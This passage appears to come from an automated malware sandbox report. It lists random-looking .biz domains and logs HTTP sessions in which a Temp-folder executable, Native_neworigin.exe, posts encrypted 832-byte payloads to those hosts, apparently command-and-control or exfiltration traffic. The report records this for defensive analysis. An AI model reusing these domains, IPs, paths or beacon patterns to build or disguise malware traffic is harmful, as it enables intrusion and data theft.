                                                                                                                                                                                                                                                                                                                                • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                • gvijgjwkh.biz

                                                                                                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.54970754.244.188.177803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:47.482656956 CET354OUTPOST /lcoyxsnwq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:47.482656956 CET832OUTData Raw: fb c5 1c 26 48 d2 50 b0 34 03 00 00 30 9e 67 20 5b 2f ed ac 74 e0 d8 d0 e1 73 34 75 47 18 dc 11 bb eb 72 a2 7d 8a 15 05 76 7d c1 0b 10 82 21 0c 67 b0 9a c0 c0 77 32 5b c7 1e fe aa 28 5a ac 05 e5 e5 1b 79 42 f1 79 f2 46 08 e4 98 ef 59 0b 5e 10 c3
                                                                                                                                                                                                                                                                                                                                Data Ascii: &HP40g [/ts4uGr}v}!gw2[(ZyByFY^|I$g^0n]cv7o`LN A.-2t3-bo]1%',W1nq4.% BhIJx e:P2ve3njA3rD+bfX+
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.189553022 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:48 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=da70d66fb88a31bce13335b7513483fc|8.46.123.75|1732094688|1732094688|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.54970818.141.10.107803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.861721039 CET354OUTPOST /clmhymdikmk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.862106085 CET832OUTData Raw: d0 55 8c 84 f2 17 0d ed 34 03 00 00 35 89 a8 36 5c 4b 97 fd f5 6a 63 e0 5d dd b2 fa 1c 4d dc 40 37 23 62 d7 0e 99 9b ab a5 d4 8d a6 b5 50 d8 46 0e 5e b3 a9 9f 71 a9 88 64 6b 4e cd fb 9c 63 7f 86 92 f6 45 6d 26 69 6b 87 e5 6d 91 63 0d 68 a2 a3 c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: U456\Kjc]M@7#bPF^qdkNcEm&ikmch6YK#~G'dC!NRMyY!ib-v8H=jszQWQs5r/P?/4xZv,e')3qD:fmt49zgdx,!]
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:50.166235924 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:49 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e3af2c98811a6fdf8273033cfc6738c7|8.46.123.75|1732094689|1732094689|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.54972254.244.188.177803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:51.494556904 CET342OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:51.494663000 CET832OUTData Raw: 01 bc b9 e5 ed 5d e2 84 34 03 00 00 85 be 95 3b fa 3b a5 41 13 62 96 2d a5 af 38 87 9d 1a 6d fa 59 67 47 ae 4c bf 83 9b 5b 55 44 a1 cf 58 93 c2 74 17 64 13 4f e1 84 ab 58 0f 82 db 03 92 ec 3e a7 e5 70 e1 64 71 be 47 5d 42 11 1f 51 43 b8 88 1a 6a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ]4;;Ab-8mYgGL[UDXtdOX>pdqG]BQCjRfXi]zP0mLb%>Op 9uTglKnG$g_m|O Lw39N%{(_hUN&Et
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:52.180725098 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:52 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=5cd5a45a143608883dbd7f8eadd4cb9c|8.46.123.75|1732094692|1732094692|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.54973144.221.84.105803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:53.134459972 CET346OUTPOST /jo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:53.134514093 CET832OUTData Raw: 4d b2 08 28 52 5f 07 53 34 03 00 00 6a 71 d6 8b b2 63 7f c5 4f e7 bd 43 30 fe 85 f3 64 aa 9f 12 58 65 db b5 7d 1d ec dd a0 ab 1a a1 fd 28 7c b4 fb 17 72 e7 99 b4 54 bd 12 51 ed de ee c7 43 e1 50 50 9f d6 99 7b 04 c7 d1 9f 55 34 6b 73 40 3c cc f9
                                                                                                                                                                                                                                                                                                                                Data Ascii: M(R_S4jqcOC0dXe}(|rTQCPP{U4ks@<?zOoK6sC^:M~^lf&[,u(+qaOS]!b5sF;1\[1$bkd~/}Y7ohtLngB~;maK
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:53.595535994 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:53 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=d461badf503e403dd1e26aa1fc3f4f27|8.46.123.75|1732094693|1732094693|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                4192.168.2.549738172.234.222.143803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:55.550132036 CET346OUTPOST /ksc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:55.550154924 CET832OUTData Raw: 99 5b 17 ca 2d ff 4e fe 34 03 00 00 9e cc 2d 93 6f e9 12 23 34 7a e1 03 25 f1 27 3c fb 06 bd 8d e0 ed 46 19 b2 bf 4e f9 ea 69 c4 3c e9 70 c2 86 91 af 47 4f ea 23 e9 60 a6 65 e0 3a cb b2 fa 15 e8 6c 83 2d a6 27 f8 67 7b a2 1e 00 84 3c 1b 13 76 98
                                                                                                                                                                                                                                                                                                                                Data Ascii: [-N4-o#4z%'<FNi<pGO#`e:l-'g{<vtXmCG`}_yPe6j{LDW:J?c0nw.!ky!(#sJlT'$\Z6k4vE@tdZY]A,g$[$}E0D#+/f=xu


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                5192.168.2.549746172.234.222.143803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:56.448538065 CET349OUTPOST /aunxkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:56.448565960 CET832OUTData Raw: f5 c1 c5 31 73 48 6b cc 34 03 00 00 2c 9e 28 cc 8c bd d2 81 a0 d0 92 f2 11 53 b1 b3 e1 97 e8 6a ee 51 27 97 0b de 43 0e 31 38 a7 7f cb 83 10 3e 4c 53 cd 37 a4 7f 96 8a ce ae 86 23 e4 8f f7 a2 93 05 85 a4 52 a2 7f 7f 70 7e 99 71 88 7d ff 91 46 b8
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1sHk4,(SjQ'C18>LS7#Rp~q}F <rJ[MSN&[DU{n6{ys~2s?ED/(%x5!Yg-6V"W=^Vgn6,t,%,DR-Gc_


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                6192.168.2.54975718.141.10.107803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:58.277299881 CET345OUTPOST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:58.277348042 CET832OUTData Raw: e8 4d 2e 0d dc 57 9c 5e 34 03 00 00 5d 4e ec 55 54 59 8d 51 ac 18 94 fb 4a c7 9c e7 d9 1b 05 db c2 dd 5a 5a 0e b5 8e 89 f5 22 48 60 d7 b1 7e 24 1a ce 92 8a 04 e4 c7 8a c7 6f 08 00 9a a2 5a c1 de 1b 9e 65 8f bb 3b e7 81 d0 b6 a4 a3 b0 28 71 17 19
                                                                                                                                                                                                                                                                                                                                Data Ascii: M.W^4]NUTYQJZZ"H`~$oZe;(q2D0a/k\X."cX[dO++c[),)lpU WXn(\{)*8f,Am+O[|Ymvs>7S~c0bkkC
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.594585896 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=37e727efb4a6ade055396541f6bf8696|8.46.123.75|1732094699|1732094699|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                7192.168.2.54977082.112.184.197803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.986546040 CET358OUTPOST /sqxjvguhdtdacidd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.986573935 CET832OUTData Raw: 34 f6 3d af b7 f7 e3 08 34 03 00 00 8d c1 31 bd 25 5b 51 b2 f3 3c 0b 28 9c 8f 0b 40 ec 47 60 97 d5 c0 4b ad de fe cc 5c 48 ad 85 fc b3 bf 2e c8 99 20 9e f2 27 fc af 46 6a 62 18 8e 22 bd 51 9e de 26 d0 02 95 bd a5 96 3c 92 9b c4 25 4d 49 d4 3a ee
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4=41%[Q<(@G`K\H. 'Fjb"Q&<%MI:qH#z%+W,\NB b/*$jVc&+uh5|_B\O|)a9NRODH',TZrq{6##&]6q{B-C{idT[5Ys~


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                8192.168.2.54977782.112.184.197803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.587620020 CET352OUTPOST /epmanlipym HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.587651968 CET832OUTData Raw: 79 f1 b3 da 4b b8 df 10 34 03 00 00 cd 51 e4 a2 4b f1 00 ef 9f 44 1e 5a 93 48 23 4c 17 b9 83 b1 67 4b 14 ed 1c bf 4c 4c 58 a8 c3 0b ba 7c e1 e3 79 2e 25 e7 1a 6c c2 59 a1 f7 16 c8 49 8e c8 22 94 0f 6c 35 d9 ea d3 ad 55 27 69 2e 11 d9 d7 ba 37 e1
                                                                                                                                                                                                                                                                                                                                Data Ascii: yK4QKDZH#LgKLLX|y.%lYI"l5U'i.74ssywS3%^ d!ULLNm,OGo>QPy$}QE@(Bt9Tvw`6$!SO%]yH2_rrriHmB)r}=*~Q{_<qD


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                9192.168.2.54980754.244.188.177805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:09.376638889 CET355OUTPOST /vfpepibjtu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:09.376662016 CET832OUTData Raw: 55 f1 f2 66 d6 8e fe dc 34 03 00 00 0c 03 09 03 dc 87 9d bb b8 0c 25 41 df 1f d1 d6 49 46 8f 06 60 97 55 84 60 99 26 cb 6b f8 83 b5 86 d1 f6 4d b2 4b 50 e7 ba 1b 99 d8 45 28 c9 b0 3c 3d 27 3e 13 22 a0 4c 31 86 01 9d ff f5 9c 77 72 3e 59 6b 5a 34
                                                                                                                                                                                                                                                                                                                                Data Ascii: Uf4%AIF`U`&kMKPE(<='>"L1wr>YkZ4Yi.&wfQmcLWw2$f+hEmf-.#pj%;$s~}V?wLp5bJ",ikG\IA^M&DAfP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:10.077310085 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:09 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=8dffba7a888d53261e50af390797d767|8.46.123.75|1732094709|1732094709|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                10192.168.2.54981418.141.10.107805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:11.156630993 CET355OUTPOST /ctaniunjcxta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:11.156670094 CET832OUTData Raw: ec 36 9b 53 64 b7 97 1e 34 03 00 00 73 78 3e 40 f4 e5 a1 3c 40 52 aa 80 b4 45 c1 95 ff 38 25 27 2a 57 9b 99 99 69 0c 24 1c 2e fc 2e c5 d5 df 8c 63 a5 c5 6d 85 1d fa a5 9a 78 3f 41 6f c4 da c4 0b db 7d 5b 62 18 15 5c 6d f3 18 38 2b 59 97 cf e9 34
                                                                                                                                                                                                                                                                                                                                Data Ascii: 6Sd4sx>@<@RE8%'*Wi$..cmx?Ao}[b\m8+Y4gSoTMQ]i(N4=2-V__Kzw0e0a~:6I.(^EK-'l{Y7eh+6v`7izSeB3Ji*>se.ZM
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:12.568881035 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:12 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=24cc25bd20197b6573f8b0e134d4ac3c|8.46.123.75|1732094712|1732094712|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                11192.168.2.54983054.244.188.177805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:13.931135893 CET356OUTPOST /duhfjaeqhlnmwtn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:13.931168079 CET832OUTData Raw: 00 9b e3 f3 7c 62 1f c8 34 03 00 00 c5 38 93 29 9e 9b 80 74 67 00 62 06 e9 5e 79 f7 d4 0b fe c6 21 55 f6 f9 a3 99 5c 54 33 82 cf 35 3c 89 9b a6 69 ad 3d 22 ae 8f 18 69 8a 38 0f 06 68 30 9d f5 34 5f b2 35 58 53 56 06 b1 ca 66 e7 c7 a5 84 55 b3 fa
                                                                                                                                                                                                                                                                                                                                Data Ascii: |b48)tgb^y!U\T35<i="i8h04_5XSVfU'}Db/-AlqW7lu'g_#6DvT3`7yFvCZ::W|GeOdeW7i<^Q:N} EpCC/hhJl%[u
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.615372896 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:14 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=ab7f1f345c12e8bd362f7d1cbc4d1aa2|8.46.123.75|1732094714|1732094714|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
